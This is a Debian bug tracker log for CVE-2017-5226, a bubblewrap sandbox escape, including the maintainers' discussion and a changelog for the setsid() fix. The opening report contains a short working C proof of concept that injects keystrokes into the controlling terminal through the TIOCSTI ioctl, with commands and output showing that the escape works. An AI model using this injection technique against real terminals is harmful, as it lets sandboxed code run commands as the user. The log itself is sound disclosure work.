CVE-2017-5226 -- bubblewrap escape

Debian Bug report logs - #850702
CVE-2017-5226 -- bubblewrap escape

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: up201407890@alunos.dcc.fc.up.pt

To: submit@bugs.debian.org

Subject: CVE-2017-5226 -- bubblewrap escape

Date: Mon, 09 Jan 2017 14:19:36 +0100

Source: bubblewrap
Version: All
Severity: grave

Hi,

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin  
/bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Message #12 received at 850702@bugs.debian.org (full text, mbox, reply):

From: Simon McVittie <smcv@debian.org>

To: up201407890@alunos.dcc.fc.up.pt, 850702@bugs.debian.org

Cc: security@debian.org

Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape

Date: Mon, 9 Jan 2017 17:29:11 +0000

Control: reassign 850702 bubblewrap 0~git160513-1
Control: forwarded 850702 https://github.com/projectatomic/bubblewrap/issues/142
Control: tags 850702 + security upstream

On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
> When executing a program via the bubblewrap sandbox, the nonpriv
> session can escape to the parent session by using the TIOCSTI ioctl to
> push characters into the terminal's input buffer, allowing an attacker
> to escape the sandbox.

Thanks. Do you have a proposed or preferred solution for this?

Please direct any further correspondence about this bug upstream if
possible: I've opened a GitHub bug
https://github.com/projectatomic/bubblewrap/issues/142 for that.

> This has been assigned CVE-2017-5226.

Assigned by whom?

If you are auditing for security vulnerabilities, please try to follow the
normal disclosure best-practices: in particular, if a vulnerability is not
already public, please contact upstream maintainers privately first, to
give them a chance to fix a vulnerability before the general public know
about it.

Regards,
    S

Message #27 received at 850702@bugs.debian.org (full text, mbox, reply):

From: Moritz Muehlenhoff <jmm@inutil.org>

To: Simon McVittie <smcv@debian.org>

Cc: up201407890@alunos.dcc.fc.up.pt, 850702@bugs.debian.org, security@debian.org

Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape

Date: Mon, 9 Jan 2017 18:41:41 +0100

On Mon, Jan 09, 2017 at 05:29:11PM +0000, Simon McVittie wrote:
> Control: reassign 850702 bubblewrap 0~git160513-1
> Control: forwarded 850702 https://github.com/projectatomic/bubblewrap/issues/142
> Control: tags 850702 + security upstream
> 
> On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
> > When executing a program via the bubblewrap sandbox, the nonpriv
> > session can escape to the parent session by using the TIOCSTI ioctl to
> > push characters into the terminal's input buffer, allowing an attacker
> > to escape the sandbox.
> 
> Thanks. Do you have a proposed or preferred solution for this?

This affects a range of other packages:
login: CVE-2005-4890
policycoreutils: CVE-2016-7545
coreutils: CVE-2016-2781
util-linux: CVE-2016-2779
policykit: CVE-2016-2568

I think we should just restrict the ioctl to non-privileged users...

Cheers,
        Moritz

Message #32 received at 850702-close@bugs.debian.org (full text, mbox, reply):

From: Simon McVittie <smcv@debian.org>

To: 850702-close@bugs.debian.org

Subject: Bug#850702: fixed in bubblewrap 0.1.5-2

Date: Mon, 09 Jan 2017 18:33:21 +0000

Source: bubblewrap
Source-Version: 0.1.5-2

We believe that the bug you reported is fixed in the latest version of
bubblewrap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 850702@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Simon McVittie <smcv@debian.org> (supplier of updated bubblewrap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 09 Jan 2017 18:09:54 +0000
Source: bubblewrap
Binary: bubblewrap
Architecture: source
Version: 0.1.5-2
Distribution: unstable
Urgency: high
Maintainer: Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>
Changed-By: Simon McVittie <smcv@debian.org>
Description:
 bubblewrap - setuid wrapper for unprivileged chroot and namespace manipulation
Closes: 850702
Changes:
 bubblewrap (0.1.5-2) unstable; urgency=high
 .
   * d/p/Call-setsid-before-executing-sandboxed-code-CVE-2017-5226.patch:
     Call setsid() before executing sandboxed code, preventing a
     sandboxed executable invoked with a controlling terminal (for
     example in Flatpak) from escalating its privileges by injecting
     keypresses into the controlling terminal with the TIOCSTI
     ioctl. (Closes: #850702; CVE-2017-5226)
   * d/control: remove Maintainer status from Laszlo Boszormenyi at his
     request. Add him to Uploaders instead, and hand the package over
     to the Utopia Maintenance Team (the same as OSTree and Flatpak).
Checksums-Sha1:
 465ce1918329c65e441c2772d939c933479bb9ac 2177 bubblewrap_0.1.5-2.dsc
 741a7935a49fb36afdea5fd73b9ce3210901e1a3 5376 bubblewrap_0.1.5-2.debian.tar.xz
Checksums-Sha256:
 8fb221eb67a948380dc6718e79ace999a6ab9a8d3d1f777441f5abdf5acd02bc 2177 bubblewrap_0.1.5-2.dsc
 7164edcf23a4ee7dfee2bacb89634cbdd086843520be4eb45bc84560473e410b 5376 bubblewrap_0.1.5-2.debian.tar.xz
Files:
 f381ca8bd16072592b4efd3e236cab82 2177 admin optional bubblewrap_0.1.5-2.dsc
 e2546f647dd6d7bf7ac55012a1475a9c 5376 admin optional bubblewrap_0.1.5-2.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE2pjyXAhxxJpZ6v8sTej/KmPHzJAFAlhz05wACgkQTej/KmPH
zJBm9w/+NZHN7IVg3M6ORKYNx9YcuuChJdl86eWnD2NfsxniMgTtDqkEQGTwg6cT
Ll1KOogAHgEaZtwCrow+JgtPJ5LcxKces34asD5UmwCcTwGoqP7wlZmPR2M8hXx4
t39T6qoacQMEgS/TrGYhDyXSaSc7iwiqXHnbvEqbT3qvPNhp1evzyTuwmETCfjAt
PyykJUNLov4WprEFN0l5T6H8CTPEa/qp0INfJbJlJoauumwK1btyholYog8kw2D+
vkJ7m8mEREvXJR5Fu627bdNbta+bDyMaN5cIba71e0QF6qcSd+LH04FI4/gMQqXT
f+HWfoGjtI0ZbJgh/lDXHUmn5uRAl3QohrJxRD85uFaIJVa6YUa5S1W3CTvY3j2p
/Nh6nLDBT8BBMglYDbG1DtTjaPDAcj0Qvh4Q7/t5l4iqKTeUYhvQEjYJdNWI4Qz6
wDL51+bYElqlWwok00znsBQhej7jd738gKo/XhMUVbM7yphUQEOX2jdfILzWSUL0
M7mZyRlC1v8+SgqSYVrtMPW0xyzj94/voR4MANRyZN/PehAF3BL/6vf8aWwcqoLX
KPuYz5FFuDWiWWsNHBak52AfEJeVrGwFZeIcXZlFQVGA1Q0ESvWVWvMjnAhEmEhu
Zo0PNfWkMP7D+daMkDPYC6l8zzwZmu/pPkTGxipb3JwtzcD+aDo=
=JSfd
-----END PGP SIGNATURE-----

Message #37 received at 850702@bugs.debian.org (full text, mbox, reply):

From: up201407890@alunos.dcc.fc.up.pt

To: "Simon McVittie" <smcv@debian.org>

Cc: 850702@bugs.debian.org, security@debian.org

Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape

Date: Mon, 09 Jan 2017 19:28:35 +0100

Quoting "Simon McVittie" <smcv@debian.org>:

> Control: reassign 850702 bubblewrap 0~git160513-1
> Control: forwarded 850702  
> https://github.com/projectatomic/bubblewrap/issues/142
> Control: tags 850702 + security upstream
>
> On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
>> When executing a program via the bubblewrap sandbox, the nonpriv
>> session can escape to the parent session by using the TIOCSTI ioctl to
>> push characters into the terminal's input buffer, allowing an attacker
>> to escape the sandbox.
>
> Thanks. Do you have a proposed or preferred solution for this?

Using setsid(), for example.

> Please direct any further correspondence about this bug upstream if
> possible: I've opened a GitHub bug
> https://github.com/projectatomic/bubblewrap/issues/142 for that.
>
>> This has been assigned CVE-2017-5226.
>
> Assigned by whom?

It was assigned by MITRE, using their web form.

> If you are auditing for security vulnerabilities, please try to follow the
> normal disclosure best-practices: in particular, if a vulnerability is not
> already public, please contact upstream maintainers privately first, to
> give them a chance to fix a vulnerability before the general public know
> about it.

Sorry about that.

As for blocking the ioctl, that breaks legitimate use.

I had this discussion with Stanislav Brabec, from SUSE a while ago.

"Just for curiosity, I just ran grep for TIOCSTI ioctl() over all
openSUSE sources. I got about 60 matches.

I analyzed use of some cases:

util-linux: used in agetty in wait_for_term_input()
kbd: contrib utility sti equal to tiocsti utility.
irda: Used by handle_scancode() to emulate input.
tcsh: Used in ed mode and in pushback().
emacs: Used in stuff_char() (putting char to be read from terminal)
..."




----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Send a report that this bug log contains spam.